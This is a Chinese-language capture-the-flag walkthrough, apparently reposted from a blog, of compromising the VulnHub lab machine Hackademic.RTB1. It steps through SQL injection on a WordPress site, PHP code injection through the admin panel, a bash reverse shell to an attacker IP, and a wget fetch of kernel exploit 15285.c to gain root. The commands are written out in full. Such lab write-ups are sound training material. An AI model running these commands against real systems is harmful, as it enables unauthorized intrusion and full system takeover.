您的位置:首页 > 科技 > IT业 > vulnhub系列:Hackademic.RTB1

vulnhub系列:Hackademic.RTB1

2024/10/5 18:26:29 来源:https://blog.csdn.net/jq_j37/article/details/141173826  浏览:    关键词:vulnhub系列:Hackademic.RTB1

vulnhub系列:Hackademic.RTB1

靶机下载

一、信息收集

nmap 扫描存活,根据 mac 地址寻找 IP

nmap 192.168.23.0/24

namp扫描网段

nmap 扫描端口,开放端口:22、80

nmap 192.168.23.143 -p- -Pn -sV -O

nmap端口扫描

访问80端口,页面发现 target 可以点击

首页

点击后跳转,页面提示目标是读取到 key.txt 文件

点击target

wappalyzer 查看网站使用的 cms、语言等

插件看cms

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

feed=rss看到框架版本

dirb目录扫描

dirb http://192.168.23.143/

dirb目录扫描

前面发现为 wordpress,kali 使用 wpscan 扫描网站

wpscan扫描网站

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wp-admin,发现后台登录页面

http://192.168.23.143/Hackademic_RTB1/wp-admin

发现后台登录页面

使用 wpscan 扫描用户

wpscan扫描用户

使用 cewl 爬取网站密码文本

cewl 192.168.23.143 -w pass.txt

爆破没有爆破出来

findsomething 中有一些参数,尝试sql注入,发现存在sql注入

192.168.23.143/Hackademic_RTB1/?cat=1

存在sql注入

dump 下数据,获取账号密码

获取账号密码

可以看到有个10级用户,直接登录这个账号

GeorgeMiller:q1w2e3

登录成功

发现后台的 php 文件,且给出了文件路径

发现php文件

添加 phpinfo();,访问文件发现可以解析执行

访问发现存在

二、getshell

写入一句话 getshell

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.133/4444 0>&1'");

image-20240813202634027

kali 开启监听

nc -lvnp 4444

image-20240813202553129

访问文件,反弹成功

http://192.168.23.143/Hackademic_RTB1/wp-content/plugins/hello.php

image-20240813202615365

三、提权

使用 python 提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

image-20240813203831776

查看当前权限,需要密码

sudo -l

查看内核版本

uname -a

image-20240813204917182

搜一下相关版本的提权漏洞

searchsploit linux kernel 2.6.3

image-20240813205206825

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

searchsploit -m 15285

image-20240813205514524

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

python3 -m http.serverwget http://192.168.23.133:8000/15285.c

image-20240813205705481

image-20240813205734802

进行编译后,执行文件,提权成功

gcc 15285.c -o 15285
./15285

image-20240813205856293

在 root 目录下发现 flag

image-20240813205955882

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com